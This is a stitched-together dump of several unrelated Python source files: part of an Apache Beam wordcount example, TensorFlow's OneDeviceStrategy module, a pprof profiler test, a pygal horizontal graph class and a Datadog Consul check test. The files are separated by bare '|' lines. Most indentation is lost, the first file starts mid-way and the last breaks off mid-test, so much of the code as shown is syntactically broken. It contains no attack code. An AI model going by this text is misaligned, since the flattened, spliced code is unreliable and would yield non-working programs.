# to run the pipeline. These metrics below track the number of
# matched and unmatched words.
self.matched_words = Metrics.counter(self.__class__, 'matched_words')
    self.unmatched_words = Metrics.counter(self.__class__, 'unmatched_words')
def process(self, element):
word, _ = element
if re.match(self.pattern, word):
# Log at INFO level each element we match. When executing this pipeline
# using the Dataflow service, these log lines will appear in the Cloud
# Logging UI.
logging.info('Matched %s', word)
self.matched_words.inc()
yield element
else:
# Log at the "DEBUG" level each element that is not matched. Different log
      # levels can be used to control the verbosity of logging, providing an
# effective mechanism to filter less important information.
# Note currently only "INFO" and higher level logs are emitted to the
# Cloud Logger. This log message will not be visible in the Cloud Logger.
logging.debug('Did not match %s', word)
      self.unmatched_words.inc()
class CountWords(beam.PTransform):
"""A transform to count the occurrences of each word.
A PTransform that converts a PCollection containing lines of text into a
PCollection of (word, count) tuples.
"""
def expand(self, pcoll):
def count_ones(word_ones):
(word, ones) = word_ones
return (word, sum(ones))
return (pcoll
| 'split' >> (beam.FlatMap(lambda x: re.findall(r'[A-Za-z\']+', x))
.with_output_types(unicode))
| 'pair_with_one' >> beam.Map(lambda x: (x, 1))
| 'group' >> beam.GroupByKey()
| 'count' >> beam.Map(count_ones))
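# A minimal local sketch (not part of the original example): it runs CountWords
# over an in-memory PCollection using TestPipeline (direct runner); the
# expected counts follow from the single input line.
def _example_count_words():
  from apache_beam.testing.test_pipeline import TestPipeline
  with TestPipeline() as p:
    counts = p | beam.Create(['to be or not to be']) | CountWords()
    assert_that(
        counts, equal_to([('to', 2), ('be', 2), ('or', 1), ('not', 1)]))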
def run(argv=None):
"""Runs the debugging wordcount pipeline."""
parser = argparse.ArgumentParser()
parser.add_argument('--input',
dest='input',
default='gs://dataflow-samples/shakespeare/kinglear.txt',
help='Input file to process.')
parser.add_argument('--output',
dest='output',
required=True,
help='Output file to write results to.')
known_args, pipeline_args = parser.parse_known_args(argv)
# We use the save_main_session option because one or more DoFn's in this
# workflow rely on global context (e.g., a module imported at module level).
pipeline_options = PipelineOptions(pipeline_args)
pipeline_options.view_as(SetupOptions).save_main_session = True
with beam.Pipeline(options=pipeline_options) as p:
# Read the text file[pattern] into a PCollection, count the occurrences of
# each word and filter by a list of words.
filtered_words = (
p | 'read' >> ReadFromText(known_args.input)
| CountWords()
| 'FilterText' >> beam.ParDo(FilterTextFn('Flourish|stomach')))
# assert_that is a convenient PTransform that checks a PCollection has an
# expected value. Asserts are best used in unit tests with small data sets
    # but are demonstrated here as a teaching tool.
#
# Note assert_that does not provide any output and that successful
# completion of the Pipeline implies that the expectations were met. Learn
# more at https://cloud.google.com/dataflow/pipelines/testing-your-pipeline
# on how to best test your pipeline.
assert_that(
filtered_words, equal_to([('Flourish', 3), ('stomach', 1)]))
# Format the counts into a PCollection of strings and write the output using
# a "Write" transform that has side effects.
# pylint: disable=unused-variable
def format_result(word_count):
(word, count) = word_count
return '%s: %s' % (word, count)
output = (filtered_words
| 'format' >> beam.Map(format_result)
| 'write' >> WriteToText(known_args.output))
if __name__ == '__main__':
# Cloud Logging would contain only logging.INFO and higher level logs logged
# by the root logger. All log statements emitted by the root logger will be
# visible in the Cloud Logging UI. Learn more at
# https://cloud.google.com/logging about the Cloud Logging UI.
#
# You can set the default logging level to a different level when running
# locally.
logging.getLogger().setLevel(logging.INFO)
run()
|
"""A tf.distribute.Strategy for running on a single device."""
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import distribute_lib
from tensorflow.python.distribute import distribute_utils
from tensorflow.python.distribute import input_lib
from tensorflow.python.distribute import input_util
from tensorflow.python.distribute import numpy_dataset
from tensorflow.python.distribute.v1 import input_lib as input_lib_v1
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import tf_export
@tf_export("distribute.OneDeviceStrategy", v1=[])
class OneDeviceStrategy(distribute_lib.Strategy):
"""A distribution strategy for running on a single device.
Using this strategy will place any variables created in its scope on the
specified device. Input distributed through this strategy will be
  prefetched to the specified device. Moreover, any functions called via
  `strategy.run` will also be placed on the specified device.
Typical usage of this strategy could be testing your code with the
tf.distribute.Strategy API before switching to other strategies which
actually distribute to multiple devices/machines.
For example:
```
strategy = tf.distribute.OneDeviceStrategy(device="/gpu:0")
with strategy.scope():
v = tf.Variable(1.0)
print(v.device) # /job:localhost/replica:0/task:0/device:GPU:0
def step_fn(x):
return x * 2
result = 0
for i in range(10):
result += strategy.run(step_fn, args=(i,))
print(result) # 90
```
"""
def __init__(self, device):
"""Creates a `OneDeviceStrategy`.
Args:
device: Device string identifier for the device on which the variables
should be placed. See class docs for more details on how the device is
used. Examples: "/cpu:0", "/gpu:0", "/device:CPU:0", "/device:GPU:0"
"""
super(OneDeviceStrategy, self).__init__(OneDeviceExtended(self, device))
distribute_lib.distribution_strategy_gauge.get_cell("V2").set(
"OneDeviceStrategy")
def experimental_distribute_dataset(self, dataset, options=None): # pylint: disable=useless-super-delegation
"""Distributes a tf.data.Dataset instance provided via dataset.
In this case, there is only one device, so this is only a thin wrapper
around the input dataset. It will, however, prefetch the input data to the
specified device. The returned distributed dataset can be iterated over
similar to how regular datasets can.
NOTE: Currently, the user cannot add any more transformations to a
distributed dataset.
Example:
```
    strategy = tf.distribute.OneDeviceStrategy(device="/gpu:0")
dataset = tf.data.Dataset.range(10).batch(2)
dist_dataset = strategy.experimental_distribute_dataset(dataset)
for x in dist_dataset:
print(x) # [0, 1], [2, 3],...
```
Args:
dataset: `tf.data.Dataset` to be prefetched to device.
options: `tf.distribute.InputOptions` used to control options on how this
dataset is distributed.
Returns:
A "distributed `Dataset`" that the caller can iterate over.
"""
return super(OneDeviceStrategy, self).experimental_distribute_dataset(
dataset, options)
def distribute_datasets_from_function(
self,
dataset_fn, # pylint: disable=useless-super-delegation
options=None):
"""Distributes `tf.data.Dataset` instances created by calls to `dataset_fn`.
`dataset_fn` will be called once for each worker in the strategy. In this
case, we only have one worker and one device so `dataset_fn` is called
once.
    The `dataset_fn` should take a `tf.distribute.InputContext` instance where
information about batching and input replication can be accessed:
```
def dataset_fn(input_context):
batch_size = input_context.get_per_replica_batch_size(global_batch_size)
d = tf.data.Dataset.from_tensors([[1.]]).repeat().batch(batch_size)
return d.shard(
input_context.num_input_pipelines, input_context.input_pipeline_id)
inputs = strategy.distribute_datasets_from_function(dataset_fn)
for batch in inputs:
replica_results = strategy.run(replica_fn, args=(batch,))
```
IMPORTANT: The `tf.data.Dataset` returned by `dataset_fn` should have a
per-replica batch size, unlike `experimental_distribute_dataset`, which uses
the global batch size. This may be computed using
`input_context.get_per_replica_batch_size`.
Args:
dataset_fn: A function taking a `tf.distribute.InputContext` instance and
returning a `tf.data.Dataset`.
options: `tf.distribute.InputOptions` used to control options on how this
dataset is distributed.
Returns:
A "distributed `Dataset`", which the caller can iterate over like regular
datasets.
"""
return super(OneDeviceStrategy,
self).distribute_datasets_from_function(dataset_fn, options)
def experimental_local_results(self, value): # pylint: disable=useless-super-delegation
"""Returns the list of all local per-replica values contained in `value`.
In `OneDeviceStrategy`, the `value` is always expected to be a single
value, so the result is just the value in a tuple.
Args:
value: A value returned by `experimental_run()`, `run()`,
`extended.call_for_each_replica()`, or a variable created in `scope`.
Returns:
A tuple of values contained in `value`. If `value` represents a single
      value, this returns `(value,)`.
"""
return super(OneDeviceStrategy, self).experimental_local_results(value)
def run(self, fn, args=(), kwargs=None, options=None): # pylint: disable=useless-super-delegation
"""Run `fn` on each replica, with the given arguments.
In `OneDeviceStrategy`, `fn` is simply called within a device scope for the
given device, with the provided arguments.
Args:
fn: The function to run. The output must be a `tf.nest` of `Tensor`s.
args: (Optional) Positional arguments to `fn`.
kwargs: (Optional) Keyword arguments to `fn`.
options: (Optional) An instance of `tf.distribute.RunOptions` specifying
the options to run `fn`.
Returns:
Return value from running `fn`.
"""
return super(OneDeviceStrategy, self).run(fn, args, kwargs, options)
def reduce(self, reduce_op, value, axis): # pylint: disable=useless-super-delegation
"""Reduce `value` across replicas.
In `OneDeviceStrategy`, there is only one replica, so if axis=None, value
is simply returned. If axis is specified as something other than None,
such as axis=0, value is reduced along that axis and returned.
Example:
```
t = tf.range(10)
result = strategy.reduce(tf.distribute.ReduceOp.SUM, t, axis=None).numpy()
# result: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
result = strategy.reduce(tf.distribute.ReduceOp.SUM, t, axis=0).numpy()
# result: 45
```
Args:
reduce_op: A `tf.distribute.ReduceOp` value specifying how values should
be combined.
value: A "per replica" value, e.g. returned by `run` to
be combined into a single tensor.
axis: Specifies the dimension to reduce along within each
replica's tensor. Should typically be set to the batch dimension, or
`None` to only reduce across replicas (e.g. if the tensor has no batch
dimension).
Returns:
A `Tensor`.
"""
return super(OneDeviceStrategy, self).reduce(reduce_op, value, axis)
def scope(self): # pylint: disable=useless-super-delegation
"""Returns a context manager selecting this Strategy as current.
Inside a `with strategy.scope():` code block, this thread
will use a variable creator set by `strategy`, and will
enter its "cross-replica context".
In `OneDeviceStrategy`, all variables created inside `strategy.scope()`
will be on `device` specified at strategy construction time.
See example in the docs for this class.
Returns:
A context manager to use for creating variables with this strategy.
"""
return super(OneDeviceStrategy, self).scope()
@tf_export(v1=["distribute.OneDeviceStrategy"]) # pylint: disable=empty-docstring
class OneDeviceStrategyV1(distribute_lib.StrategyV1):
__doc__ = OneDeviceStrategy.__doc__.replace(
"For example:\n ```",
"For example:\n ```\n tf.enable_eager_execution()")
def __init__(self, device):
super(OneDeviceStrategyV1, self).__init__(OneDeviceExtended(self, device))
distribute_lib.distribution_strategy_gauge.get_cell("V1").set(
"OneDeviceStrategy")
__init__.__doc__ = OneDeviceStrategy.__init__.__doc__
class OneDeviceExtended(distribute_lib.StrategyExtendedV1):
"""Implementation of OneDeviceStrategy."""
def __init__(self, container_strategy, device):
super(OneDeviceExtended, self).__init__(container_strategy)
self._device = device_util.resolve(device)
self._input_device = device_util.get_host_for_device(self._device)
def _input_workers_with_options(self, options=None):
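    # With experimental_fetch_to_device=False (a tf.distribute.InputOptions
    # field), data stays on the input (host) device rather than being
    # prefetched to the compute device.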
if not options or options.experimental_fetch_to_device:
return input_lib.InputWorkers([(self._input_device, (self._device,))])
else:
return input_lib.InputWorkers([(self._input_device,
(self._input_device,))])
@property
def _input_workers(self):
return self._input_workers_with_options()
def _create_variable(self, next_creator, **kwargs):
colocate_with = kwargs.pop("colocate_with", None)
if colocate_with is None:
with ops.device(self._device):
return next_creator(**kwargs)
elif isinstance(colocate_with, numpy_dataset.SingleDevice):
with ops.device(colocate_with.device):
return next_creator(**kwargs)
else:
with ops.colocate_with(colocate_with):
return next_creator(**kwargs)
def _validate_colocate_with_variable(self, colocate_with_variable):
distribute_utils.validate_colocate(colocate_with_variable, self)
def _make_dataset_iterator(self, dataset):
"""Make iterator from dataset without splitting the batch."""
# Note that split_batch_by argument is not passed because it is always 1 in
# this strategy, and adding it adds unnecessary overhead to the dataset.
return input_lib_v1.DatasetIterator(dataset, self._input_workers,
self._container_strategy())
def _make_input_fn_iterator(
self,
input_fn,
replication_mode=distribute_lib.InputReplicationMode.PER_WORKER):
return input_lib_v1.InputFunctionIterator(input_fn, self._input_workers,
[distribute_lib.InputContext()],
self._container_strategy())
def _experimental_make_numpy_dataset(self, numpy_input, session):
return numpy_dataset.one_host_numpy_dataset(
numpy_input, numpy_dataset.SingleDevice(self._input_device), session)
def _broadcast_to(self, tensor, destinations):
del destinations
return tensor
def _experimental_distribute_dataset(self, dataset, options):
# Note that split_batch_by argument is not passed because it is always 1 in
# this strategy, and adding it adds unnecessary overhead to the dataset.
if (options and options.experimental_replication_mode ==
distribute_lib.InputReplicationMode.PER_REPLICA):
raise NotImplementedError(
"InputReplicationMode.PER_REPLICA "
"is only supported in "
"`experimental_distribute_datasets_from_function`."
)
return input_util.get_distributed_dataset(
dataset,
self._input_workers_with_options(options),
self._container_strategy(),
options=options)
def _distribute_datasets_from_function(self, dataset_fn, options):
if (options and options.experimental_replication_mode ==
distribute_lib.InputReplicationMode.PER_REPLICA):
raise NotImplementedError(
"InputReplicationMode.PER_REPLICA "
"is only supported in "
"`experimental_distribute_datasets_from_function` "
"of tf.distribute.MirroredStrategy")
return input_util.get_distributed_datasets_from_function(
dataset_fn,
self._input_workers_with_options(options),
[distribute_lib.InputContext()],
self._container_strategy(),
options=options)
def _experimental_distribute_values_from_function(self, value_fn):
# TODO(b/137795644): This should return a PerReplica value but other
# methods like run in OneDeviceStrategy need to be modified
# to do the same.
return value_fn(distribute_lib.ValueContext())
# TODO(priyag): Deal with OutOfRange errors once b/111349762 is fixed.
def _experimental_run_steps_on_iterator(self, fn, iterator, iterations,
initial_loop_values=None):
if initial_loop_values is None:
initial_loop_values = {}
initial_loop_values = nest.flatten(initial_loop_values)
ctx = input_lib.MultiStepContext()
def body(i, *args):
"""A wrapper around `fn` to create the while loop body."""
del args
fn_result = fn(ctx, iterator.get_next())
flat_last_step_outputs = nest.flatten(ctx.last_step_outputs)
with ops.control_dependencies([fn_result]):
return [i + 1] + flat_last_step_outputs
# We capture the control_flow_context at this point, before we run `fn`
# inside a while_loop. This is useful in cases where we might need to exit
    # these contexts and get back to the outer context to do some things,
    # e.g. to create an op which should be evaluated only once at the end of
    # the loop on the host. One such usage is in creating metrics' value op.
self._outer_control_flow_context = (
ops.get_default_graph()._get_control_flow_context()) # pylint: disable=protected-access
# TODO(priyag): Use max_iterations instead of an explicit counter.
cond = lambda i, *args: i < iterations
i = constant_op.constant(0)
loop_result = control_flow_ops.while_loop(
cond, body, [i] + initial_loop_values, name="",
parallel_iterations=1, back_prop=False, swap_memory=False,
return_same_structure=True)
del self._outer_control_flow_context
ctx.run_op = control_flow_ops.group(loop_result)
# Convert the last_step_outputs from a list to the original dict structure
# of last_step_outputs.
last_step_tensor_outputs = loop_result[1:]
last_step_tensor_outputs_dict = nest.pack_sequence_as(
ctx.last_step_outputs, last_step_tensor_outputs)
ctx._set_last_step_outputs(last_step_tensor_outputs_dict) # pylint: disable=protected-access
return ctx
def _call_for_each_replica(self, fn, args, kwargs):
strategy = self._container_strategy()
with ops.device(self._device), _OneDeviceReplicaContext(strategy):
return fn(*args, **kwargs)
def _reduce_to(self, reduce_op, value, destinations, options):
del reduce_op, destinations, options
return value
def _gather_to_implementation(self, value, destinations, axis, options):
del destinations, axis, options
return value
def _update(self, var, fn, args, kwargs, group):
# The implementations of _update() and _update_non_slot() are identical
# except _update() passes `var` as the first argument to `fn()`.
return self._update_non_slot(var, fn, (var,) + tuple(args), kwargs, group)
def _update_non_slot(self, colocate_with, fn, args, kwargs, group):
del colocate_with
with ops.device(self._device), distribute_lib.UpdateContext(self._device):
result = fn(*args, **kwargs)
if group:
return result
else:
return nest.map_structure(self._local_results, result)
def read_var(self, replica_local_var):
"""Read the aggregate value of a replica-local variable."""
return array_ops.identity(replica_local_var)
def _local_results(self, value):
return (value,)
def value_container(self, value):
return value
def _in_multi_worker_mode(self):
"""Whether this strategy indicates working in multi-worker settings."""
return False
@property
def _num_replicas_in_sync(self):
return 1
@property
def worker_devices(self):
return (self._device,)
@property
def parameter_devices(self):
return (self._device,)
def non_slot_devices(self, var_list):
del var_list
return (self._device,)
@property
def experimental_should_init(self):
return True
@property
def experimental_between_graph(self):
return False
@property
def should_checkpoint(self):
return True
@property
def should_save_summary(self):
return True
# TODO(priyag): Delete this once all strategies use global batch size.
@property
def _global_batch_size(self):
"""Global and per-replica batching are equivalent for OneDeviceStrategy."""
return True
@property
def _support_per_replica_values(self):
return False
def _get_local_replica_id(self, replica_id_in_sync_group):
return replica_id_in_sync_group
class _OneDeviceReplicaContext(distribute_lib.ReplicaContext):
"""ReplicaContext for OneDeviceStrategy."""
def __init__(self, strategy):
distribute_lib.ReplicaContext.__init__(
self, strategy, replica_id_in_sync_group=0)
@property
def devices(self):
return self._strategy.extended.worker_devices
|
"""Tests for pprof_profiler."""
import gzip
from proto import profile_pb2
from tensorflow.core.framework import step_stats_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
from tensorflow.python.profiler import pprof_profiler
class PprofProfilerTest(test.TestCase):
def testDataEmpty(self):
output_dir = test.get_temp_dir()
run_metadata = config_pb2.RunMetadata()
graph = test.mock.MagicMock()
graph.get_operations.return_value = []
profiles = pprof_profiler.get_profiles(graph, run_metadata)
self.assertEqual(0, len(profiles))
profile_files = pprof_profiler.profile(
graph, run_metadata, output_dir)
self.assertEqual(0, len(profile_files))
def testRunMetadataEmpty(self):
output_dir = test.get_temp_dir()
run_metadata = config_pb2.RunMetadata()
graph = test.mock.MagicMock()
op1 = test.mock.MagicMock()
op1.name = 'Add/123'
op1.traceback = [('a/b/file1', 10, 'some_var')]
op1.type = 'add'
graph.get_operations.return_value = [op1]
profiles = pprof_profiler.get_profiles(graph, run_metadata)
self.assertEqual(0, len(profiles))
profile_files = pprof_profiler.profile(
graph, run_metadata, output_dir)
self.assertEqual(0, len(profile_files))
def testValidProfile(self):
output_dir = test.get_temp_dir()
run_metadata = config_pb2.RunMetadata()
node1 = step_stats_pb2.NodeExecStats(
node_name='Add/123',
op_start_rel_micros=3,
op_end_rel_micros=5,
all_end_rel_micros=4)
run_metadata = config_pb2.RunMetadata()
device1 = run_metadata.step_stats.dev_stats.add()
device1.device = 'deviceA'
device1.node_stats.extend([node1])
graph = test.mock.MagicMock()
op1 = test.mock.MagicMock()
op1.name = 'Add/123'
op1.traceback = [
('a/b/file1', 10, 'apply_op', 'abc'), ('a/c/file2', 12, 'my_op', 'def')]
op1.type = 'add'
graph.get_operations.return_value = [op1]
expected_proto = """sample_type {
type: 5
unit: 5
}
sample_type {
type: 6
unit: 7
}
sample_type {
type: 8
unit: 7
}
sample {
value: 1
value: 4
value: 2
label {
key: 1
str: 2
}
label {
key: 3
str: 4
}
}
string_table: ""
string_table: "node_name"
string_table: "Add/123"
string_table: "op_type"
string_table: "add"
string_table: "count"
string_table: "all_time"
string_table: "nanoseconds"
string_table: "op_time"
string_table: "Device 1 of 1: deviceA"
comment: 9
"""
# Test with protos
profiles = pprof_profiler.get_profiles(graph, run_metadata)
self.assertEqual(1, len(profiles))
self.assertTrue('deviceA' in profiles)
self.assertEqual(expected_proto, str(profiles['deviceA']))
# Test with files
profile_files = pprof_profiler.profile(
graph, run_metadata, output_dir)
self.assertEqual(1, len(profile_files))
with gzip.open(profile_files[0]) as profile_file:
profile_contents = profile_file.read()
profile = profile_pb2.Profile()
profile.ParseFromString(profile_contents)
self.assertEqual(expected_proto, str(profile))
@test_util.run_v1_only('b/120545219')
def testProfileWithWhileLoop(self):
options = config_pb2.RunOptions()
options.trace_level = config_pb2.RunOptions.FULL_TRACE
run_metadata = config_pb2.RunMetadata()
num_iters = 5
with self.cached_session() as sess:
i = constant_op.constant(0)
c = lambda i: math_ops.less(i, num_iters)
b = lambda i: math_ops.add(i, 1)
r = control_flow_ops.while_loop(c, b, [i])
sess.run(r, options=options, run_metadata=run_metadata)
profiles = pprof_profiler.get_profiles(sess.graph, run_metadata)
self.assertEqual(1, len(profiles))
profile = next(iter(profiles.values()))
add_samples = [] # Samples for the while/Add node
for sample in profile.sample:
if profile.string_table[sample.label[0].str] == 'while/Add':
add_samples.append(sample)
# Values for same nodes are aggregated.
self.assertEqual(1, len(add_samples))
# Value of "count" should be equal to number of iterations.
self.assertEqual(num_iters, add_samples[0].value[0])
if __name__ == '__main__':
test.main()
|
"""
Horizontal graph base
"""
from pygal.graph.graph import Graph
from pygal.view import HorizontalView, HorizontalLogView
class HorizontalGraph(Graph):
"""Horizontal graph"""
def __init__(self, *args, **kwargs):
self.horizontal = True
super(HorizontalGraph, self).__init__(*args, **kwargs)
def _post_compute(self):
self._x_labels, self._y_labels = self._y_labels, self._x_labels
self._x_2nd_labels, self._y_2nd_labels = (
self._y_2nd_labels, self._x_2nd_labels)
def _axes(self):
self.view._force_vertical = True
super(HorizontalGraph, self)._axes()
self.view._force_vertical = False
def _set_view(self):
"""Assign a view to current graph"""
if self.logarithmic:
view_class = HorizontalLogView
else:
view_class = HorizontalView
self.view = view_class(
self.width - self.margin.x,
self.height - self.margin.y,
self._box)
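# A minimal composition sketch (an assumption, not part of this module):
# concrete horizontal charts in pygal mix HorizontalGraph in ahead of a
# vertical chart class so the label swap and horizontal view above apply:
#
#     from pygal.graph.bar import Bar
#
#     class HorizontalBar(HorizontalGraph, Bar):
#         """Horizontal bar chart"""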
|
import random
from tests.checks.common import AgentCheckTest, load_check
from utils.containers import hash_mutable
MOCK_CONFIG = {
'init_config': {},
    'instances': [{
'url': 'http://localhost:8500',
'catalog_checks': True,
}]
}
MOCK_CONFIG_SERVICE_WHITELIST = {
'init_config': {},
    'instances': [{
'url': 'http://localhost:8500',
'catalog_checks': True,
'service_whitelist': ['service_{0}'.format(k) for k in range(70)]
}]
}
MOCK_CONFIG_LEADER_CHECK = {
'init_config': {},
    'instances': [{
'url': 'http://localhost:8500',
'catalog_checks': True,
'new_leader_checks': True
}]
}
MOCK_CONFIG_SELF_LEADER_CHECK = {
'init_config': {},
    'instances': [{
'url': 'http://localhost:8500',
'catalog_checks': True,
'self_leader_check': True
}]
}
MOCK_CONFIG_NETWORK_LATENCY_CHECKS = {
'init_config': {},
    'instances': [{
'url': 'http://localhost:8500',
'catalog_checks': True,
'network_latency_checks': True
}]
}
MOCK_BAD_CONFIG = {
'init_config': {},
    'instances': [{  # Multiple instances should cause it to fail
'url': 'http://localhost:8500',
'catalog_checks': True,
'new_leader_checks': True
}, {
'url': 'http://localhost:8501',
'catalog_checks': True,
'new_leader_checks': True,
'self_leader_check': True
}]
}
def _get_random_ip():
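    # int(15 * random.random()) is 0-14, so addresses span 10.0.2.10-10.0.2.24.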
rand_int = int(15 * random.random()) + 10
return "10.0.2.{0}".format(rand_int)
class TestCheckConsul(AgentCheckTest):
CHECK_NAME = 'consul'
def mock_get_peers_in_cluster(self, instance):
return [
"10.0.2.14:8300",
"10.0.2.15:8300",
"10.0.2.16:8300"
]
def mock_get_services_in_cluster(self, instance):
return {
"service-1": [
"az-us-east-1a"
],
"service-2": [
"az-us-east-1a"
],
"service-3": [
"az-us-east-1a"
],
"service-4": [
"az-us-east-1a"
],
"service-5": [
"az-us-east-1a"
],
"service-6": [
"az-us-east-1a"
]
}
def mock_get_n_services_in_cluster(self, n):
dct = {}
for i in range(n):
k = "service_{0}".format(i)
dct[k] = []
return dct
def mock_get_local_config(self, instance, instance_state):
return {
"Config": {
"AdvertiseAddr": "10.0.2.15",
"Datacenter": "dc1",
"Ports": {
"DNS": 8600,
"HTTP": 8500,
"HTTPS": -1,
"RPC": 8400,
"SerfLan": 8301,
"SerfWan": 8302,
"Server": 8300
},
}
}
def mock_get_nodes_in_cluster(self, instance):
return [
{
"Address": "10.0.2.15",
"Node": "node-1"
},
{
"Address": "10.0.2.25",
"Node": "node-2"
},
{
"Address": "10.0.2.35",
"Node": "node-2"
},
]
def mock_get_nodes_with_service(self, instance, service):
return [
{
"Checks": [
{
"CheckID": "serfHealth",
"Name": "Serf Health Status",
"Node": "node-1",
"Notes": "",
"Output": "Agent alive and reachable",
"ServiceID": "",
"ServiceName": "",
"Status": "passing"
},
{
"CheckID": "service:{0}".format(service),
"Name": "service check {0}".format(service),
"Node": "node-1",
"Notes": "",
"Output": "Service {0} alive".format(service),
"ServiceID": service,
"ServiceName": "",
"Status": "passing"
}
],
"Node": {
"Address": _get_random_ip(),
"Node": "node-1"
},
"Service": {
"Address": "",
"ID": service,
"Port": 80,
"Service": service,
"Tags": [
"az-us-east-1a"
]
}
}
]
def mock_get_nodes_with_service_warning(self, instance, service):
return [
{
"Checks": [
{
"CheckID": "serfHealth",
"Name": "Serf Health Status",
"Node": "node-1",
"Notes": "",
"Output": "Agent alive and reachable",
"ServiceID": "",
"ServiceName": "",
"Status": "passing"
},
{
"CheckID": "service:{0}".format(service),
"Name": "service check {0}".format(service),
"Node": "node-1",
"Notes": "",
"Output": "Service {0} alive".format(service),
"ServiceID": service,
"ServiceName": "",
"Status": "warning"
}
],
"Node": {
"Address": _get_random_ip(),
"Node": "node-1"
},
"Service": {
"Address": "",
"ID": service,
"Port": 80,
"Service": service,
"Tags": [
"az-us-east-1a"
]
}
}
]
def mock_get_nodes_with_service_critical(self, instance, service):
return [
{
"Checks": [
{
"CheckID": "serfHealth",
"Name": "Serf Health Status",
"Node": "node-1",
"Notes": "",
"Output": "Agent alive and reachable",
"ServiceID": "",
"ServiceName": "",
"Status": "passing"
},
{
"CheckID": "service:{0}".format(service),
"Name": "service check {0}".format(service),
"Node": "node-1",
"Notes": "",
"Output": "Service {0} alive".format(service),
"ServiceID": service,
"ServiceName": "",
"Status": "warning"
},
{
"CheckID": "service:{0}".format(service),
"Name": "service check {0}".format(service),
"Node": "node-1",
"Notes": "",
"Output": "Service {0} alive".format(service),
"ServiceID": service,
"ServiceName": "",
"Status": "critical"
}
],
"Node": {
"Address": _get_random_ip(),
"Node": "node-1"
},
"Service": {
"Address": "",
"ID": service,
"Port": 80,
"Service": service,
"Tags": [
"az-us-east-1a"
]
}
}
]
def mock_get_coord_datacenters(self, instance):
return [{
"Datacenter": "dc1",
"Coordinates": [
{
"Node": "host-1",
"Coord": {
"Vec": [
0.036520147625677804,
-0.00453289164613373,
-0.020523210880196232,
-0.02699760529719879,
-0.02689207977655939,
-0.01993826834797845,
-0.013022029942846501,
-0.002101656069659926
],
"Error": 0.11137306578107628,
"Adjustment": -0.00021065907491393056,
"Height": 1.1109163532378512e-05
}
}]
}, {
"Datacenter": "dc2",
"Coordinates": [
{
"Node": "host-2",
"Coord": {
"Vec": [
0.03548568620505946,
-0.0038202417296129025,
-0.01987440114252717,
-0.026223108843980016,
-0.026581965209197853,
-0.01891384862245717,
-0.013677323575279184,
-0.0014257906933581217
],
"Error": 0.06388569381495224,
"Adjustment": -0.00036731776343708724,
"Height": 8.962823816793629e-05
}
}]
}]
def mock_get_coord_nodes(self, instance):
return [{
"Node": "host-1",
"Coord": {
"Vec": [
0.007682993877165208,
0.002411059340215172,
0.0016420746641640123,
0.0037411046929292906,
0.004541946058965728,
0.0032195622863890523,
-0.0039447666794166095,
-0.0021767019427297815
],
"Error": 0.28019529748212335,
"Adjustment": -9.966407036439966e-05,
"Height": 0.00011777098790169723
}
}, {
"Node": "host-2",
"Coord": {
"Vec": [
0.007725239390196322,
0.0025160987581685982,
0.0017412811939227935,
0.003740935739394932,
0.004628794642643524,
0.003190871896051593,
-0.004058197296573195,
-0.002108437352702053
],
"Error": 0.31518043241386984,
"Adjustment": -0.00012274366490350246,
"Height": 0.00015006836008626717
}
}]
def mock_get_cluster_leader_A(self, instance):
return '10.0.2.15:8300'
def mock_get_cluster_leader_B(self, instance):
return 'My New Leader'
def _get_consul_mocks(self):
return {
'get_services_in_cluster': self.mock_get_services_in_cluster,
'get_nodes_with_service': self.mock_get_nodes_with_service,
'get_peers_in_cluster': self.mock_get_peers_in_cluster,
'_get_local_config': self.mock_get_local_config,
'_get_cluster_leader': self.mock_get_cluster_leader_A,
'_get_coord_datacenters': self.mock_get_coord_datacenters,
'_get_coord_nodes': self.mock_get_coord_nodes,
}
def test_get_nodes_with_service(self):
self.run_check(MOCK_CONFIG, mocks=self._get_consul_mocks())
self.assertMetric('consul.catalog.nodes_up', value=1, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_passing', value=1, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_warning', value=0, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_critical', value=0, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.services_up', value=6, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_passing', value=6, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_warning', value=0, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_critical', value=0, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
def test_get_nodes_with_service_warning(self):
my_mocks = self._get_consul_mocks()
my_mocks['get_nodes_with_service'] = self.mock_get_nodes_with_service_warning
self.run_check(MOCK_CONFIG, mocks=my_mocks)
self.assertMetric('consul.catalog.nodes_up', value=1, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_passing', value=0, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_warning', value=1, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_critical', value=0, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.services_up', value=6, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_passing', value=0, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_warning', value=6, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_critical', value=0, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
def test_get_nodes_with_service_critical(self):
my_mocks = self._get_consul_mocks()
my_mocks['get_nodes_with_service'] = self.mock_get_nodes_with_service_critical
self.run_check(MOCK_CONFIG, mocks=my_mocks)
self.assertMetric('consul.catalog.nodes_up', value=1, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
